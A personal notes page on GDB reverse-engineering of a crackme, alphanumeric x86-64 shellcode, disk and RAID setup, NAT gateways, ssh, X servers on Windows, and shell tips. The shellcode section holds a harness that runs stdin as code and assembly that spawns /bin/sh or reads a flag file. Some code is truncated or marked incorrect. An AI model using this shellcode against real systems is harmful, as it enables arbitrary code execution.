Random Notes


GDB 逆向调试


可以直接控制台输入 gdb 并在 GDB 中指定程序(例为 crackme)。

$ gdb
+ (gdb)
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type "help".
Type "apropos word" to search for commands related to "word".
+ (gdb) file crackme
Reading symbols from crackme...done.

或者也可以直接指定程序(假定 crackme 在当前目录下)。

$ gdb ./crackme

或者也可以把 GDB attach 到正在运行的程式上,这对于某些检查是否处于 debugger 环境中的程式比较有用。以下三种方式都可以实现 attach。

$ gdb -p pid
$ gdb progName pid

$ gdb progName
(gdb) attach pid



可以使用 show env 查看环境变量讯息。

(gdb) show env

设置环境变量则可以用 set env ENV=value,比如下面添加了一个环境变量 FOO,值为 bar

(gdb) set env FOO = bar

gdb 内部会默认设置两个环境变量 LINESCOLUMNS。众所周知,环境变量是放在栈底(大地址)的,增加环境变量会影响栈帧地址的构成。如果希望能减少这种影响,可以用 unset 删除环境变量。

(gdb) unset env LINES
(gdb) unset env COLUMNS


指定程序后并不会直接运行,需要使用 run 或者缩写 r

(gdb) r

需要传参的话可以在 run 之前 set args

(gdb) set args inputfile.txt
(gdb) r

或者直接 r args

(gdb) r inputfile.txt


(gdb) r $(echo "hello!")

也可以使用 startstarti 来运行程序,本质上是在 main (如果是 C 或者 C++ 程序……有人用 gdb debug 其他语言吗?)处设置一临时断点后执行 run。所有传给 start 的参数都会 verbatim 地转递给 run

startistart 的区别是如果 main 函数存在 elaboration phase (比如 C++ 里全局变量的建构函数执行),starti 将会在 elaboration phase 的开头打临时断点。


在程序运行前和运行中可以用 breakb 指定断点(breakpoint),可以使用函数名,行号(逆向的话通常不知道)和指令地址。


(gdb) b main


(gdb) b 9

使用指令地址断点(根据汇编),注意因为是地址所以要用 b *address 格式。

譬如在汇编中注意到有 strcmp 函数调用:

(gdb) disas
Dump of assembler code for function main:
    0x080486a3 <+0>:     push   ebp
    0x080486d1 <+46>:    add    esp,0x8
    0x080486d4 <+49>:    push   0x8048817
    0x080486d9 <+54>:    lea    eax,[ebp-0x10]
    0x080486dc <+57>:    push   eax
+   0x080486dd <+58>:    call   0x8048420 <strcmp@plt>
    0x080486e2 <+63>:    add    esp,0x8

则可以在 call strcmp 处断点。

(gdb) b *0x080486dd
Breakpoint 2 at 0x80486dd: file crackme.c, line 15.

或者也可以用相对 main 的偏移(offset)来断点。

(gdb) b *main+58


(gdb) r
Starting program: /path/to/crackme
Breakpoint 1, main (argc=1, argv=0xffffd6c4) at crackme.c:9

可以使用 info breakpoint 或者 i b 查看当前所有的断点。删除断点则是用 delete <breakpoint number>d <breakpoint number>



disassembledisas 可以查看 当前 栈帧(frame)的汇编。比如刚才在 main 处打了断点,就能够查看 main 的汇编。

(gdb) disas
Dump of assembler code for function main:
   0x08048486 <+0>:     push   ebp
   0x08048487 <+1>:     mov    ebp,esp
   0x08048489 <+3>:     sub    esp,0x4

汇编格式默认是 AT&T, 不想看 AT&T 的阴间汇编的话要提前设置 assembly flavor。

(gdb) set disassembly-flavor intel

带上 /m 参数可以把源码和汇编一起排列(如果有源码的话),没有也能显示一组汇编对应的 c 程序行号,打断点更方便一些。

(gdb) disas /m
Dump of assembler code for function main:
7       in crackme.c
   0x08048486 <+0>:     push   ebp
   0x08048487 <+1>:     mov    ebp,esp
   0x08048489 <+3>:     sub    esp,0x4


可以使用 info register 或缩写 i r 查看寄存器值。可能是最常用的操作了。

(gdb) i r
eax            0xf7fbcdd8       -134492712
ecx            0xfcf63fa0       -50970720
edx            0xffffd654       -10668
ebx            0x0      0
esp            0xffffd624       0xffffd624
ebp            0xffffd628       0xffffd628
esi            0xf7fbb000       -134500352
edi            0x0      0
eip            0x804848c        0x804848c <main+6>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99


如果你知道变量名,可以用 print varp var 打印其内容,也可以打印寄存器内容。

比如打印 argv[0] (程序名)

(gdb) p argv[0]
$1 = 0xffffd7f4 "/path/to/crackme"

注意到 print 有一个自增 id,我们可以通过 print $id 来打印之前打印过的值。

(gdb) p $1
$2 = 0xffffd7f4 "/path/to/crackme"

x address 可以用来检视内存内容,比如 x $eax 会把 %eax 中存储的值解读为内存地址,并打印其内容。

px 可以用基本相同的一套格式化方法来指定要打印变量 / 内存地址被解读为何种类型。

  • /o:8 进制(octal)
  • /x:16 进制 (hexadecimal)
  • /u:无符号 10 进制(unsigned decimal)
  • /t:binary
  • /f:floating point
  • /a:address —— 这不还是 16 进制吗 =、=
  • /c:char
  • /s:string

x 模式还可以用 /i 采用指令(instruction)格式化方法。在搞 Buffer Overflow 的时候查看写进栈内的 shellcode 异常好用。

(gdb) x/7i 0xfffd6b0
  0xffffd6b0    add    ecx, esp
  0xffffd6b2    push   ecx
  0xffffd6b3    mov    ecx, esp
  0xffffd6b5    xor    edx, edx
  0xffffd6b7    push   0
->0xffffd6b9    sar    bl, 1
  0xffffd6bb    test   dword ptr [eax], 0

x 还能指定字符串的字符宽度(譬如 UTF-16le 或 UTF-8 字符宽度就可能为 2 或 3 个字节)。

  • b: byte
  • h: halfword (16-bit value)
  • w: word (32-bit value)
  • l: giant word (64-bit value)


(gdb) x/bs 0x8048817
0x8048817:      "250381"
(gdb) x/ws 0x8048817
0x8048817:      U"\x33303532\x50003138\x77737361\x2064726f\x3a204b4f\x616c0029\x3a313062\x6f747574\x6c616972\x766e4900\x64696c61\x73615020\x726f7773Ⅴ\x31b0100䀻܀\xfffbc000烿\xfffc8000铿\xfffcd000峿\xfffda600\xa8ff\xfffe5300죿\xfffed000\xffff3000\x134ff᐀"
(gdb) x/hs 0x8048817
0x8048817:      u"㔲㌰ㄸ倀獡睳牯⁤䭏㨠)慬ぢ㨱畴潴楲污䤀癮污摩倠獡睳牯Ⅴ"
(gdb) x/ls 0x8048817
0x8048817:      "250381"


如果想边看汇编边调试的话,可以用 layout asm 显示汇编和命令行。

(gdb) layout asm


layout asm

想要退出 layout 模式只需 Ctrl + X, A (按住 Ctrl + X 后再按 A,类似 VSCode 的 Ctrl + K, * 系列操作)。

layout 除了显示汇编,还可以显示其他内容。具体参数如下:

  • src : Displays source and command windows.
  • asm : Displays disassembly and command windows.
  • split : Displays source, disassembly and command windows.
  • regs : Displays register window. If existing layout


continue 或缩写 c 可以让程序运行到下一个断点。

nextn 可以让程序运行到 当前栈帧 的下一条语句。在遇到函数调用时,next 不会跟踪进入函数。

steps 可以让程序运行到下一条语句。在遇到函数调用的时候,step 跟踪进入函数。

nextistepi 与不带 i 的指令类似,区别是他们会让程序运行到下一条汇编指令(i 指 instruction)。


觉得在 GDB 里看汇编太累的话可以 objdump 整个文件,在喜欢的编辑器里带着高亮慢慢看。 Sublime Text 3 推荐 NASM x86 Assembly 这个高亮。

$ objdump -M intel -d crackme > crackme.asm

使用 pwndbg 这个 GDB 插件可以把工作量(指记住 GDB 命令)减少很多。在每次运行到断点时 pwndbg 都会把可能需要的信息漂亮地打出来


Alphanumeric shellcode

Alphanumeric shellcode 限定所使用的汇编 opcode 只能在 0x20 ~ 0x7f 范围内——这正是“人类可读”的 ascii 字符的范围。所以如果你用如下代码编译出一份字节文件,你将得到一份看起来像乱码文本,但实际上又可执行的怪东西!

gcc -m64 -c -o shellcode.o shellcode.S
objcopy -S -O binary -j .text shellcode.o shellcode.ascii

下面我们研究一下,如何书写一份 x86-64 风格的 alphanumeric shellcode。



演示 shellcode 执行

直接把传入的 shellcode 读到 buf 中并且将 buf 解释为函数指针执行 buf

#include <stdio.h>
#include <string.h>
#include <err.h>
#include <stdlib.h>

char buf[2048];

int main()
  if (!fgets(buf, sizeof(buf), stdin))
    err(1, "Too long input");

  // a few info for debugging
  printf("> length: %d\n", (int)strlen(buf));
  for (int i = 0; i < strlen(buf); i += 1) {
    if (i % 16 == 0)
      printf("> %04X: ", i);
    printf("%02X ", (unsigned char)buf[i]);
    if (i % 16 == 15)

  (*(void (*)()) buf)();


 .global _start
        ; Set %rcx as stack pointer
        ; and align %rsp
        push $0x5a
        push %rsp
        pop %rcx
        pop %rax

        ; Get magic offset and store in %rdi
        xor $0x55, %al
        push %rax                       ; 0x14 on the stack now.
        pop %rax                        ; add back to %esp
        imul  $0x41, (%rcx), %edi       ; %rdi = 0x3cf, a "magic offset" for us
                                        ; This is decimal value 975.
                                        ; If this is too low/high, suggest a
                                        ; modification to xor of %al for
                                        ; changing the imul results

        ; Write the syscall
        movslq (%rcx,%rdi,1), %rsi
        xor %esi, (%rcx,%rdi,1)         ; 4 bytes have been nulled
        push $0x3030474a
        pop %rax
        xor $0x30304245, %eax
        push %rax
        pop %rax                        ; Garbage reg
        movslq (%rcx), %rsi
        xor %esi, (%rcx,%rdi,1)

        ; Sycall written, set values now.
        ; allocate 8 bytes for '/bin/sh\0'
        movslq 0x30(%rcx), %rsi
        xor %esi, 0x30(%rcx)
        movslq 0x34(%rcx), %rsi
        xor %esi, 0x34(%rcx)

        ; Zero rdx, rsi, and rdi
        movslq 0x30(%rcx), %rdi
        movslq 0x30(%rcx), %rsi
        push %rdi
        pop %rdx

        ; Store '/bin/sh\0' in %rdi
        push $0x5a58555a
        pop %rax
        xor $0x34313775, %eax
        xor %eax, 0x30(%rcx)            ; '/bin'  just went onto the stack

        push $0x6a51475a
        pop %rax
        xor $0x6a393475, %eax
        xor %eax, 0x34(%rcx)            ; '/sh\0' just went onto the stack
        xor 0x30(%rcx), %rdi            ; %rdi now contains '/bin/sh\0'

        pop %rax
        push %rdi

        push $0x58
        movslq (%rcx), %rdi
        xor (%rcx), %rdi                ; %rdi zeroed
        pop %rax
        push %rsp
        xor (%rcx), %rdi
        xor $0x63, %al
#include <sys/syscall.h>

.globl main
.type main, @function


    /* PART I : OPEN */
    /* start of buf 0x6020c0 */
    /* about 100 bytes long! */
    /* Set rcx as stack pointer */
    push $0x58
    push %rsp
    pop %rcx
    pop %rax

    /* rdx = 0x6020c0, start of buf*/
    movslq 0x50(%rcx), %rax
    push $0x30585040
    pop %rax
    xor $0x30387140, %rax
    push %rax
    pop %rdx

    /* Write the syscall to designated place */
    push $0x30302847
    pop %rax
    xor $0x30307522, %eax            /* 0x602100 */
    push %rax
    pop %rax                        /* Garbage reg */
    movslq (%rcx), %rsi
    xor %esi, 0x5b(%rdx)

    /* Sycall written, set values now.
     allocate 16 bytes for '/proc/flag\0' */
    movslq 0x50(%rcx), %rsi
    xor %esi, 0x50(%rcx)
    movslq 0x54(%rcx), %rsi
    xor %esi, 0x54(%rcx)
    movslq 0x58(%rcx), %rsi
    xor %esi, 0x58(%rcx)
    movslq 0x5c(%rcx), %rsi
    xor %esi, 0x5c(%rcx)

    /* Zero rdx, rsi, and rdi */
    movslq 0x50(%rcx), %rdi
    movslq 0x50(%rcx), %rsi
    push %rdi
    pop %rdx

    /* Store '/bin/sh\0' in %rdi */
    push $0x31315039
    pop %rax
    xor $0x31313758, %eax
    xor %eax, 0x58(%rcx)            /* 'ag\0\0'  just went onto the stack */

    push $0x58575a3b
    pop %rax
    xor $0x34317558, %eax
    xor %eax, 0x54(%rcx)            /* 'c/fl' just went onto the stack */

    push $0x5b43475a
    pop %rax
    xor $0x34313775, %eax
    xor %eax, 0x50(%rcx)           /* /pro just went onto the stack*/
    xor 0x50(%rcx), %rdi
    xor 0x58(%rcx), %rsi

    pop %rax
    pop %rax
    push %rsi
    push %rdi

    push $0x58
    movslq (%rcx), %rsi
    xor (%rcx), %rsi                /* %rsi zeroed */
    movslq (%rcx), %rdi
    xor (%rcx), %rdi                /* %rdi zeroed */
    pop %rax
    push %rsp
    xor $0x5a, %al
    xor (%rcx), %rdi               /* From here, rdi = pointer to /proc/flag */
                                   /* rsi = 0 = read mode */

/* This will be modified to syscall */
    push $0x58

    /********** PART2 : READ ***********/
    /* eax now has fd, move it to rdi */
    push %rax
    pop  %rdi

    /* rsp in rcx */
    push $58
    push %rsp
    pop  %rcx
    pop %rax

    movslq (%rcx), %rsi
    xor %esi, (%rcx)
    movslq (%rcx), %rsi
    xor %esi, (%rcx)

    /* rdx = 0x602060 */
    push $0x61616161
    pop  %rax
    xor  $0x61616161, %eax  /* empty rax */

    push $0x30585058
    pop %rax
    xor $0x30387138, %rax
    push %rax
    pop %rdx

    /* emtpy rax again */
    push $0x61616161
    pop  %rax
    xor  $0x61616161, %eax  /* empty rax */

    /* Write the syscall to designated place */
    push $0x30302847
    pop %rax
    xor $0x30307522, %eax            /* 0x005d65 */
    push %rax
                          /* Garbage reg */
    movslq (%rcx), %rsi
    xor %esi, 0x58(%rdx)

    /* Put 0x100 into %rdx */
    push $0x61616161
    pop %rax
    xor $0x61616061, %eax
    push %rax
    pop %rdx

    push $0x58
    pop %rax
    push %rcx
    pop %rsi
    xor $0x58, %al

/* To be syscall*/
    push $0x58

    /********** PART3 : WRITE ***********/
    /* rsp in rcx */
    push $0x58
    push %rsp
    pop  %rcx
    pop %rax   /* Garbage */

    /* Set rdx = 0x602200 */
    push $0x61616161
    pop  %rax
    xor  $0x61616161, %eax  /* empty rax */

    push $0x30586858
    pop %rax
    xor $0x30384a58, %rax /* TODO: the value is not correct now */
    push %rax
    pop %rdx

    /* emtpy rax again */
    push $0x61616161
    pop  %rax
    xor  $0x61616161, %eax  /* empty rax */

    /* Write the syscall to designated place */
    push $0x30302847
    pop %rax
    xor $0x30302847, %eax            /* 0x005d65 */
    push %rax
    pop %rax                      /* Garbage reg */
    movslq (%rcx), %rdi
    xor %edi, 0x58(%rdx)

    /* Put 0x100 into %rdx */
    push $0x61616161
    pop %rax
    xor $0x61616561, %eax
    push %rax
    pop %rdx

    push $0x58
    pop %rax
    xor $0x59, %al /* rax set to 1 */
    push %rax
    pop %rdi
    push %rax
    pop %rdi
    push %rax
    pop %rdi
    push %rax
    pop %rdi
    push %rax
    pop %rdi
    push %rax
    pop %rdi

/* To be syscall*/
    push $0x58


  1. NetSec: Alphanumeric Shellcode

Disk Management

Normal Disk Operations

Add a disk

List the disk currently have in hand. Or just lsblk will also do.

sda          256G                   disk
sdb          256G                   disk /

Format new disks.

$ mkfs -t ext4 /dev/sba
$ mkfs.ext4 /dev/sba

Mount the formatted disk to certain directory.

$ mount /dev/sba /mnt/sba

Add to /etc/fstab so that you don't need to mount it every time the device boots (how does it work?).

$ sudo bash -c 'echo "/dev/sba /mnt/sba ext4 defaults 0 0" >> /etc/fstab

Or use UUID.

$ UUID=$(sudo blkid | grep /dev/sba | cut -f2 -d ' ' | sed -e 's/\"//g')
$ sudo bash -c 'echo "${UUID} /mnt/sba ext4 defaults 0 0" >> /etc/fstab'

Or add a label to the disk and use the label to mount.

$ sudo e2label /dev/sba DISK1
sudo bash -c 'echo "LABEL=DISK1 /mnt/sba ext4 defaults 0 0" >> /etc/fstab'

Optimize disk performance

Adjust the readahead value to increase IO performance

$ sudo blockdev /dev/sba

The readahead value is <desired_readahead_bytes> / 512 bytes.

For example, for an 8-MB readahead, 8 MB is 8388608 bytes (8 * 1024 * 1024).

8388608 bytes / 512 bytes = 16384

Set blockdev to 16384 to havea 8-MB readahead.

sudo blockdev --setra 16384 /dev/sba

RAID Operations

The best option to make a software RAID array is mdadm. You can get it from apt or other package manager.

$ sudo apt install mdadm

Normal operations

Check RAID configuration

$ sudo mdadm --detail --scan

Check RAID operation progress / whether there is already a RAID array available

$ cat /proc/mdstat
Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10]
md0 : active raid5 nvme5n1[0] nvme7n1[2] nvme6n1[1] nvme8n1[4] nvme9n1[5]
      60011155456 blocks super 1.2 level 5, 512k chunk, algorithm 2 [5/5] [UUUUU]
      bitmap: 0/112 pages [0KB], 65536KB chunk

unused devices: <none>

Create and resize a RAID array

Create a RAID5 disk array called /dev/md0 with /dev/sda /dev/sdb and /dev/sdc (might take quite some time)

Note that actually a RAID5 disk array can only be named in the form of /dev/md[0-9]+

$ sudo mdadm --create --verbose /dev/md0 \
  --level=5 --raid-devices=3 /dev/sda /dev/sdb /dev/sdc

Grow a RAID5 disk array /dev/md0 with 1 new disk called /dev/sdd (might take quite some time)

$ sudo mdadm --add /dev/md0 /dev/sdd
$ mdadm --grow --raid-devices=5 /dev/md0


  1. Google Cloud Docs: Optimizing persistent disk performance

Ubuntu 18.04 Internet Connection Sharing

Our school has some weird regulations that each lab can only get 1 internet LAN cable assigned. But our lab has multiple servers and all of them need internet connection. So I (as the server manager) decided to set up internet connection sharing.


A gateway server with 2 Network Interface Card (NIC)s, eth0), connects to the internet, eth1 connects and manages the internal network.

The netplan configuration looks as follows:

    addresses: [<some ip>/24]
    gateway4: <some gateway>
        addresses: [,] # important!
    dhcp4: no
    dhcp6: no
    address: []
    dhcp4: no
    dhcp6: no

eth1 can have whatever address falls in private IP subnet.

Gateway setup

Enable IP forwarding

Execute the following command

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

Also edit /etc/sysctl.conf by uncommenting this line


Set up NAT rules

sudo iptables -A FORWARD -o eth0 -i eth1 -s -m conntrack --ctstate NEW -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -F POSTROUTING
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

The first rule allows forwarded packets (initial ones). The second rule allows forwarding of established connection packets (and those related to ones that started). The third rule does the NAT.

Automatic setup

Save the iptables:

sudo iptables-save | sudo tee /etc/iptables.sav

Edit /etc/rc.local and add the following lines before the exit 0 line

iptables-restore < /etc/iptables.sav

Client setup

Open /etc/netplan/whatevername.yaml and edit it

    address: []
    gateway: # important!
        addresses: [,] # important!

It is very important that:

  1. gateway address is the intranet IP of the gateway computer
  2. nameservers should use the same ones as the gateway computer

Once editted, run the fllowing command

sudo netplan apply

And then you can check the internet connetion by pinging some famous websites

$ ping www.google.com
PING www.google.com ( 56(84) bytes of data.
64 bytes from nrt12s15-in-f68.1e100.net ( icmp_seq=1 ttl=112 time=36.3 ms
64 bytes from nrt12s15-in-f68.1e100.net ( icmp_seq=2 ttl=112 time=89.8 ms
64 bytes from nrt12s15-in-f68.1e100.net ( icmp_seq=3 ttl=112 time=58.2 ms

ssh config

  • $HOME/.ssh/config -- personal configuration
  • /etc/ssh/ssh_config -- global configuration


Host <alias>
    SSH_OPTION  value

Common options

Host * # match all hosts
    User matchy
    IdentityFile $HOME/.ssh/id_ed25519

Host cloud
    HostName dev.example.com
    # automatically use "matchy" as the User
    # automatically use id_ed25519 as the IdentityFile

Host dev
    User mischa # overwrites User="matchy"
    Port 2333
    IdentityFile $HOME/.ssh/id_rsa # overwrites

Port forwarding

Host to_forward
    # ...
+   LocalForward <port-to-forward><port-on-local>

Jump/Bastion server make-easy

ProxyJump is available since OpenSSH version 7.5.

 Host bastion
     HostName transfer.example.com
     User matchy
     IdentityFile ~/.ssh/id_ed25519

 Host node
     HostName # the intranet IP to the bastion
+    ForwardAgent yes
+    ProxyJump bastion

If your ssh is olderthan OpenSSH 7.5 but newer than OpenSSH 5.4 (assuming bastion config exists in the ssh config):

 Host node
     # ...
+    ProxyCommand ssh bastion -W [%h]:%p

If your ssh is even older than OpenSSH 5.4...

 Host node
     # ...
+    ProxyCommand ssh bastion nc -q0 %h %p 2> /dev/null

Change starting directory

RemoteCommand is available since OpenSSH version 7.5.

 Host node
     # ...
+    RequestTTY force
+    RemoteCommand cd /path/to/your/directory && bash -l

The command bash -l means starting a bash session as the login shell. Alternatively, if you prefer zsh or fish (or any other shells), simply use zsh -l or fish -l instead.

To Dos

  • Avoid broken pipe

Use perf to profile


perf is available in the linux-tools package.

To enable perf to profile user-space applications, you need to install the linux-tools-generic package.

To enable perf to profile kernel-space applications, you need to install the linux-tools-uname -r` package.

sudo apt install linux-tools-common linux-tools-generic linux-tools-`uname -r
 sudo sysctl kernel.perf_event_paranoid=-1
 sudo sysctl kernel.kptr_restrict=0
 sudo mount -o remount,mode=755 /sys/kernel/tracing/


perf record -- <command>

i18n related settings (LANG, LANGUAGE, LC_ALL etc)

On Ubuntu, because I am using Ubuntu.

Explanation of LC_* variables

  • LANG: default locale
  • LANGUAGE: list of languages in order of preference
  • LC_ALL: overrides all other LC_* variables, for debugging

Technically the order of precedence is LANGUAGE > LC_ALL > LC_* > LANG. (According to locale(7))

Behavior on Ubuntu

This is an observation on Ubuntu 20.04, when I try to switch from Chinese (accidentally and automatically for no reason set for a newly created user) to English.

Is it in English?LANG=en_USLANGUAGE=en_USLC_ALL=en_US
Display language
vim messages
apt messages
welcome message*
sudo prompt

*: It's the content in /var/run/motd.dynamic that is displayed when you log in.


VPN via Cisco Anyconnect

I always work on a remote server, and I need to connect to the university network to access some resources and do homework submission. Hence I need to set up a VPN nn that server (where I have sudo rights)

Setting up Unibas VPN

Download Linux VPN Client with:

$ wget --user <unibas-long-username> --password <unibas-password> \

As instructed, run the script with sudo:

$ sudo chmod +x anyconnect-linux64-4.10.06079-core-vpn-webdeploy-k9.sh
$ sudo ./anyconnect-linux64-4.10.06079-core-vpn-webdeploy-k9.sh

Cisco VPN client will be installed to /opt/cisco/anyconnect/.

Initially tried /opt/cisco/anyconnect/bin/vpn connect vpn.mobile.unibas.ch, but the required authentication method is not supported for CLI.

The tried Remote Desktop + the GUI client. But was prompted:

VPN establishment capability for a remote user is disabled.
A VPN connection will not be established.

It's because inside the profile of cisco anyconnect the VPN establishment is configured to LocalUserOnly (for Linux if you install to the default path, the configuration xml file will locate in /opt/cisco/anycconnect/profile/).


Change it to AllowRemoteUsers will solve the problem. But Cisco will always re-write the configuration file to LocalUserOnly after you close the GUI client. So it is necessary to watch the file and re-write it back to AllowRemoteUsers after it is changed.

Hack Cisco AnyConnect VPN's configuration



How to enable (and hack) Cisco AnyConnect VPN through Remote Desktop

在 Windows 10 上装 X

Motivation: 为啥装 X?

  1. 在 WSL 还在刀耕火种时期,想要在 WSL 上使用 GUI 应用需要 Windows 上安装有 X server
  2. 不用 MobaXTerm 或者 PuTTY (这些为 Windows 设计的 terminal emulator 开发比较完善,内建 X forwarding 解决方案) 也能转发 GUI 时需要 Windows 上装有 X server 才能 forwarding

安装 Xserver 和 HiDPI 设置

Windows 上的 Xserver 有好几个选择,我用的是 VcXsrv。如果你用 choco 或者 scoop,还能更方便,可以直接 choco install vcxsrv 或者 scoop install vcxsrv(不过 scoop 需要先 scoop bucket add extras)。

可爱强强又富有的狗哥推荐了微软应用商店的 X410,看起来和 Windows 10 整合得很优秀,不过真的好贵啊……

然后是 HiDPI 设置,一般通过轻薄本现在应该都至少是 2K 或 3K 屏幕了。不设置一下的话字体会糊。

首先找到软件的安装路径,比如 C:\Program Files\VcXsrv,然后对两个可执行文件 vcxsrv.exe 和 xlaunch.exe 执行以下操作:

  1. 右键点击可执行文件
  2. 进入 Properties -> Compatibility -> Change high DPI settings -> High DPI scaling override
  3. 选中 Override high DPI scaling behavior
  4. 将 Scaling performed by 选项设为 Application

vcsrv HiDPI setting


确保要连接到的服务器上 sshd 被正确配置。在 /etc/ssh/sshd_config 中确保 X11Forwarding 被设置为 yes

X11Forwarding yes

如有需要,可以设置 X11DisplayOffset,默认是 10。

X11DisplayOffset 10

启动 Xserver

在开始菜单查找 XLaunch 并运行,一路默认就可以开启 Xserver。

如果之前设置了 X11DisplayOffset,在启动时注意不要让 vcxsrv 自己设置 DISPLAY (默认 -1),不然它会随机选一个数字……在之后设置客户端的时候有点头痛。

如果是 WSL2,记得还要关闭 access control。用命令行的话就是添加 -ac 选项。

客户端 (Windows/WSL) 设置

为了能够成功进行 X forwarding,客户端需要设置好 $DISPLAY 环境变量。这可不是 Unix,没法直接 export DISPLAY=:0。想要把远端 forward 到 Windows 上看下面的 "Windows 设置", "WSL 设置" 是为了在 WSL 上使用 GUI 应用的。

Windows 设置

打开 PowerShell,输入以下指令即可在当前 terminal 临时设置 DISPLAY 环境变量:


如何一劳永逸:打开你的 PowerShell profile 文件(一般是 $HOME\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1,也可以 notepad $PROFILE 打开, $PROFILE 不区分大小写),把上面的指令加进去, 再 . $PROFILE 一下就好了。

WSL 设置

WSL1 可以 export DISPLAY=localhost:10.0 , WSL2 就要指定 IP 了。 可以这样一劳永逸:

export DISPLAY=$(awk '/nameserver / {print $2; exit}' /etc/resolv.conf 2>/dev/null):10.0

这里也设置了一下 LIBGL_ALWAYS_INDIRECT,虽然窝目前好像也没什么 3D rendering 需要……


然后是 WSL 方面的 HiDPI 显示设置,当然是有多种解决方案的。参考 Arch Linux wiki 有关 HiDPI 的页面 (写得超级棒!),感觉设置 GTK(GDK)的环境变量是最泛用的。


export GDK_SCALE=1
export GDK_DPI_SCALE=1.5

这个数值在小新 Pro 13 的 2K 屏幕上对于大多数应用效果都不错。不过 JB 家的 IntelliJ IDEA 和 CLion 因为是 Swing 应用, UI scale 只支援整数倍,1.5 似乎相当于 scale 到 2 了,导致字都看起来非常大……不过可以通过调整字体大小解决。

这个表格大致整理了应该修改哪些地方(基于 CLion 2020 的菜单层级):

Appearance & Behavior > Appearance > Use Custom Font设置绝大多数 UI 字体
Editor > Font
Editor > Color Scheme > Color Scheme Font
Editor > Color Scheme > Console Font设置内建终端(Integrated Terminal)的字体


设置好 DISPLAY 和 HiDPI 支援并开启 Xserver 之后就能运行 GUI 应用了。

可以拿 xeyes 测试一下:

sudo apt install x11-apps


也能正常使用安装在 WSL 的 Sublime Text、CLion、IntelliJ IDEA 等等。

JetBrains IDE 的进一步调整

装了 JB 家的几个 IDE 之后发现没法即开即用,还要再配置点东西。

Use Windows default browser

WSL 没有默认浏览器(当然),而 JB 家 IDE 的 markdown 渲染器依赖 JCEF,所以必须得有个浏览器。我们可以用 Windows 的浏览器:

打开 Settings > Tools > Web Browsers,将 Default Browser 的路径改为 /mnt/c/path/to/your/browser/browser.exe 即可。

Resolve JCEF dependency issue

JCEF 依赖的 libcef.solibjcef.so 两个库都有一大堆依赖。根据 event log 的报错安装一下就好了。我缺 libXsslibgbm

$ sudo apt install libxss1 libgbm1

CJK 字体支援

当然可以手动安装字体,不过也可以在 /usr/share/fonts/ 创建连到 Windows 字体库的软链接:

sudo ln -s /mnt/c/Windows/Fonts/ /usr/share/fonts/WindowsFonts

然后 logout 再登入,或用 fc-cache 手动 index 字体库,即可愉快阅览中日韩内容。

fc-cache -f -v


Windows 计划推出 WSLg,以后估计就不用这样了。


  1. 鸟哥的 Linux 私房菜:第二十三章、X Window 设定介绍
  2. Lainme's Blog:如何优雅的在 Linux 上装 X

Tricks on Windows

Windows 上的一些奇技淫巧


Concise error message

# PowerShell 7.0+
$ErrorView = 'ConciseView'
# PowerShell 5.0+
$ErrorView = 'CategoryView'

But honestly, ConciseView will still sometimes produce multiline error message. Especially when the error is generated from a PowerShell script.


First thing first: Run cmdlet as Administrator.


del /f <path-to-file>


takeown /f <path-to-file> /r /d y
icacls <path-to-file> /grant administrators:F /t
rd /s /q <path-to-file>

删除 Service

In short, use sc delete <service-name>.

sc stop <service-name>
sc delete <service-name>

But the service name must be short service name.

Use sc query to get the short service name.

$ sc query state= all | find "<service-name>"
  SERVICE_NAME: <service-name>

Sometimes you might need to print the context of your search because you might match to DISPLAY_NAME instead of SERVICE_NAME. cmd does not have grep like powerful string search tool (neither find nor findstr can do this). Use Select-String in PowerShell instead.

Note that sc is the alias of Set-Content in PowerShell. One should use sc.exe to call the sc command.

# print 5 lines before and after the match
sc.exe query state= all | Select-String -Pattern "<service-name>" -Context 5, 5

Effective Shell

定位到行开头Ctrl + A 或者 Home
定位到行末尾Ctrl + D 或者 End
Alt + B 或者 Ctrl + ⬅
Alt + F 或者 Ctrl + ➡
删除整行(zshCtrl + U
所有字符(非 zsh
Ctrl + U
Ctrl + K
删除一个词Ctrl + W 或者 Alt + D
上一条命令Ctrl + P 或者 ⬆
下一条命令Ctrl + N 或者 ⬇
Ctrl + X, E

Ctrl + X,E 打开的编辑器是通过环境变量 $EDITOR 指定的。


Navigating the Command Line

Note that Ctrl + D is sometimes captured as exit.

Random bash tips

mv/cp with wildcard (blob)

The following command will not work

mv "${dir}/*.txt" "${dir}/another_place"

* will not be expanded inside quotation marks. To make it work, * should be put outside the quote.

mv "${dir}/"*".txt" "${dir}/another_place"

Should have more explanation on wildcards and globs

Monitor everything...

pv: pipe viewer

Monitor tar extraction progress

pv file.tar.gz | tar -xz


$ pv big-files-1.tar.gz | tar -I pigz -x -C source/fasta/metaclust_db_1
9.30GiB 0:01:43 [93.1MiB/s] [=>             ] 17% ETA 0:08:12

Monitor tar compression progress

tar cf - . -P -T file_list.1 | pv -s $( du -sb <file_list.1 | awk '{print $1}') | pigz -k > big-files.tar.g

tmux usage 101

Motivation: why you should use tmux?

tmux is very useful under the following scenarios:

  1. When you ssh to a server, you would like to open multiple shells but don't want to ssh for multiple times.
  2. When you want to leave your work on the server running without needing to keep your shell alive, and moreover, you want to resume working on it afterwards

And it's just cool when you can split the shells windows!

Basic Usage

All the commands for tmux are only available after you type the command prefix (termed CmdP hereafter). By default it is Ctrl-b. After pressing this combination, it will activate the console mode (or so I believe).

Pane commands

"Split current pane vertically, create new pane underneath
%Split current pane horizontally, create new pane on the right
xClose current pane (with confirmation, contrasst to simply pressing Ctrl-d)
zMaximize current pane (after v1.8)
!Move current pane to a new window and open it there
;Switch to the latest used pane
